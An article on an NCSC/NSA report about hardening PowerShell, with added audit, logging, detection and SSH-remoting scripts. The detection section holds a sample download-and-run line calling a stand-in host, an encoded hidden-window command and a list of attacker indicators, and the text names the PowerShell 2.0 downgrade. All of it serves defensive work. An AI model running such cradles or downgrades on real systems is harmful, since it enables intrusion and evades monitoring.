The NCSC, alongside the US National Security Agency (NSA), recently published a report detailing how PowerShell can be abused by hostile parties, and recommending that operators and administrators of Microsoft systems implement PowerShell's built-in security features rather than removing the tool.
PowerShell is a scripting language and command-line shell built into Windows for managing the operating system. Defenders commonly use it to support forensic work, improve incident response and automate common, repetitive tasks.
While PowerShell can be used to protect and assist businesses, its ease of use and ubiquity have also made it a favoured post-exploitation tool for attackers. The report's authors recommend against disabling PowerShell, since doing so hinders defensive capabilities and normal operation of the operating system; instead they recommend keeping PowerShell updated to a current version and configuring its settings so that the newer defensive capabilities are actually in use.
The authors recommended enabling the following features:
Credential protection and network controls for PowerShell remoting, to keep important organisational information (including administrative credentials) from being exposed on remote hosts: remoting over WinRM does not hand the administrator's credentials to the remote machine, and the Windows Firewall rules for remoting (ports 5985 and 5986) should restrict which hosts are allowed to connect.
Antimalware Scan Interface (AMSI) integration, so that script content is scanned for malware at the point it is run, including content that is decoded or built in memory (this requires an AMSI-aware antivirus product, e.g. Windows Defender, McAfee or Symantec).
Application control with AppLocker or Windows Defender Application Control (WDAC), which places PowerShell into Constrained Language mode and so limits what an attacker who has obtained a PowerShell session can do on the host.
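The following audit script is an added example, not code from the report or from Microsoft; it checks whether the features listed above are actually in effect on a host. It reports the PowerShell version and language mode, whether an AMSI-aware antivirus blocks Microsoft's documented AMSI test string, the AppLocker script-rule enforcement mode, the WDAC user-mode enforcement status and whether the legacy PowerShell 2.0 engine (which has none of these protections and is a common downgrade target) is still installed. The AppLocker and WDAC queries need the AppLocker module and the DeviceGuard WMI namespace respectively; the optional-feature check needs an elevated prompt, so each is wrapped so a failure reports as Unknown rather than aborting.

```powershell
# Added example (not from the NSA/NCSC report): audit a host's PowerShell
# hardening state and return one object summarising the findings.
function Test-PowerShellHardening {
    [CmdletBinding()]
    param()

    $result = [ordered]@{
        PSVersion            = $PSVersionTable.PSVersion.ToString()
        LanguageMode         = $ExecutionContext.SessionState.LanguageMode.ToString()
        AmsiBlocking         = $false
        AppLockerScriptRules = 'Unknown'
        WdacUserModeStatus   = 'Unknown'
        V2EngineState        = 'Unknown'
    }

    # AMSI: Microsoft's documented test string is flagged by any AMSI-aware
    # antivirus. When a provider is active, PowerShell refuses to run the
    # string and throws a ParseException (error id ScriptContainedMaliciousContent).
    # Any other error (typically CommandNotFound, because "AMSI" is not a
    # command) means the text reached the runtime, i.e. nothing blocked it.
    try {
        Invoke-Expression 'AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386'
    } catch {
        if ($_.FullyQualifiedErrorId -like '*ScriptContainedMaliciousContent*' -or
            $_.Exception.Message -match 'malicious content') {
            $result.AmsiBlocking = $true
        }
    }

    # AppLocker: enforcement mode of the Script rule collection, which is the
    # collection that governs .ps1 files and drives Constrained Language mode.
    try {
        $scriptRules = (Get-AppLockerPolicy -Effective -ErrorAction Stop).RuleCollections |
            Where-Object { $_.RuleCollectionType -eq 'Script' }
        $result.AppLockerScriptRules = if ($scriptRules) { $scriptRules.EnforcementMode.ToString() } else { 'NotConfigured' }
    } catch { }

    # WDAC: UsermodeCodeIntegrityPolicyEnforcementStatus is 0 = Off, 1 = Audit, 2 = Enforced.
    try {
        $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard -ErrorAction Stop
        $result.WdacUserModeStatus = @('Off', 'Audit', 'Enforced')[[int]$dg.UsermodeCodeIntegrityPolicyEnforcementStatus]
    } catch { }

    # PowerShell 2.0 engine: if present, "powershell -version 2" bypasses script
    # block logging, AMSI and Constrained Language mode. Needs an elevated prompt.
    try {
        $v2 = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2 -ErrorAction Stop
        $result.V2EngineState = $v2.State.ToString()
    } catch { }

    [pscustomobject]$result
}

# Usage: run in the session you want to assess (the language mode reported is
# that of the calling session, so run it as a standard user, not only as admin).
Test-PowerShellHardening | Format-List
```

A fully hardened host shows AmsiBlocking True, LanguageMode ConstrainedLanguage for non-administrative users, AppLockerScriptRules Enabled or WdacUserModeStatus Enforced, and V2EngineState Disabled. A False for AmsiBlocking on a machine that has antivirus installed usually means the product is not AMSI-aware, which is exactly the dependency noted in the list above.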
The authors also recommend enabling PowerShell's logging features, Deep Script Block Logging (DSBL), module logging and Over-the-Shoulder (OTS) transcription, which record the commands and script content actually executed (including code that was obfuscated or built in memory). Together they allow continuous monitoring of PowerShell activity so that potential abuse can be detected and alerted on.
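As an added example (not code from the report), the script below turns on the three logging features by writing the same registry values that the corresponding Group Policy settings set, then scans script block events for indicators that commonly appear in malicious PowerShell. The transcript directory, the indicator list and the three sample script blocks are all constructed for this example; the event log name, event ID 4104 and the ScriptBlockText property index are the real ones used by script block logging. Run the enable function from an elevated prompt.

```powershell
# Added example (not from the NSA/NCSC report). Run elevated.
function Enable-PowerShellLogging {
    param([string]$TranscriptDir = 'C:\PSTranscripts')   # assumed path; lock its ACL so users can append but not read

    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

    # Deep Script Block Logging -> event ID 4104 in Microsoft-Windows-PowerShell/Operational
    New-Item -Path "$base\ScriptBlockLogging" -Force | Out-Null
    Set-ItemProperty -Path "$base\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord

    # Module logging for every module ('*') -> event ID 4103 (pipeline execution details)
    New-Item -Path "$base\ModuleLogging" -Force | Out-Null
    New-Item -Path "$base\ModuleLogging\ModuleNames" -Force | Out-Null
    Set-ItemProperty -Path "$base\ModuleLogging" -Name EnableModuleLogging -Value 1 -Type DWord
    Set-ItemProperty -Path "$base\ModuleLogging\ModuleNames" -Name '*' -Value '*' -Type String

    # Over-the-Shoulder transcription -> a text transcript of every session, with
    # an invocation header (timestamp) before each command
    New-Item -Path "$base\Transcription" -Force | Out-Null
    Set-ItemProperty -Path "$base\Transcription" -Name EnableTranscripting -Value 1 -Type DWord
    Set-ItemProperty -Path "$base\Transcription" -Name EnableInvocationHeader -Value 1 -Type DWord
    Set-ItemProperty -Path "$base\Transcription" -Name OutputDirectory -Value $TranscriptDir -Type String
}

# Constructed indicator list. PowerShell's -match is case-insensitive, so no
# character classes are needed for case variants.
$script:SuspiciousPatterns = @(
    '-enc(odedcommand)?\b',                       # base64-encoded command line
    'FromBase64String',                           # decoding a payload in memory
    '(Invoke-Expression|\bIEX\b)',                # running dynamically built code
    '(DownloadString|DownloadFile)',              # staging code from the network
    '-w(indowstyle)?\s+hidden',                   # hiding the console window
    '\[System\.Reflection\.Assembly\]::Load',     # reflective assembly loading
    'Set-MpPreference.*-Disable'                  # tampering with Defender
)

function Find-SuspiciousScriptBlock {
    param([Parameter(ValueFromPipeline)][string]$ScriptText)
    process {
        $hits = $script:SuspiciousPatterns | Where-Object { $ScriptText -match $_ }
        if ($hits) {
            [pscustomobject]@{
                Matched = @($hits)
                Preview = $ScriptText.Substring(0, [Math]::Min(80, $ScriptText.Length))
            }
        }
    }
}

# Live version: pull recent 4104 events; Properties[2] is ScriptBlockText.
function Get-SuspiciousScriptBlockEvent {
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction Stop |
        ForEach-Object { $_.Properties[2].Value } |
        Find-SuspiciousScriptBlock
}

# Constructed sample script blocks so the scan can be exercised without live
# events. "ZABpAHIA" is the UTF-16LE base64 encoding of "dir".
$samples = @(
    'Get-ChildItem C:\Users | Sort-Object Length',
    'powershell -nop -w hidden -enc ZABpAHIA',
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a.ps1")'
)
$samples | Find-SuspiciousScriptBlock
```

The first sample produces no output; the second matches the encoded-command and hidden-window patterns and the third matches the IEX and DownloadString patterns. Script block logging only exists in PowerShell 5.0 and later, so the logging policy is only worth relying on once the 2.0 engine has been removed, otherwise an attacker can start `powershell -version 2` and leave no 4104 events at all.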
They also recommend enabling PowerShell remoting over Secure Shell (SSH), which allows public key authentication and makes remote management of machines through PowerShell both convenient and secure.
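The script below is an added example of setting this up (it is not configuration from the report or from Microsoft's documentation, although the `Subsystem` line follows the form Microsoft documents). It assumes the Windows OpenSSH Server capability and PowerShell 7 are installed on the server; the pwsh.exe location, the server name, the user name and the client key path are assumptions. Only PowerShell 6 and later can act as the SSH subsystem, so Windows PowerShell 5.1 alone is not enough on the server side.

```powershell
# Added example (not from the NSA/NCSC report): expose PowerShell 7 as an SSH
# subsystem, require key-based authentication, then open a session from a client.
# Server side: run elevated on the Windows host.
$sshdConfig = Join-Path $env:ProgramData 'ssh\sshd_config'

# The 8.3 short path avoids the space in "Program Files", which sshd_config
# does not quote. -sshs puts pwsh into SSH-server mode; adjust the path if
# PowerShell 7 is installed elsewhere (assumption).
$subsystem = 'Subsystem powershell c:/progra~1/powershell/7/pwsh.exe -sshs -NoLogo'

$config = Get-Content -Path $sshdConfig
if (-not ($config -match '^Subsystem\s+powershell')) {
    Add-Content -Path $sshdConfig -Value $subsystem
    $config = Get-Content -Path $sshdConfig
}

# Prefer public key authentication and turn passwords off. Install the client's
# public key first: for members of Administrators the default sshd_config reads
# keys from %ProgramData%\ssh\administrators_authorized_keys, for other users
# from the user's ~\.ssh\authorized_keys.
$config = $config -replace '^#?\s*PubkeyAuthentication\s.*', 'PubkeyAuthentication yes'
$config = $config -replace '^#?\s*PasswordAuthentication\s.*', 'PasswordAuthentication no'
Set-Content -Path $sshdConfig -Value $config
Restart-Service -Name sshd

# Client side (PowerShell 7 on any platform): authenticate with the key,
# run one command remotely, then tear the session down.
$session = New-PSSession -HostName 'server01.example.invalid' `
                         -UserName 'admin' `
                         -KeyFilePath (Join-Path $HOME '.ssh\id_ed25519')
Invoke-Command -Session $session -ScriptBlock { $PSVersionTable.PSVersion }
Remove-PSSession -Session $session
```

Disabling password authentication before the key is in place locks the administrator out of SSH, so test a key-based login in a second window before restarting sshd with the new settings. The SSH transport is independent of WinRM, so the credential-protection and firewall points for WinRM remoting above do not apply here; instead the private key and the authorized_keys files become the assets to protect.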
The report includes a table of the available features per PowerShell version and operating system.
See the report for more information and details.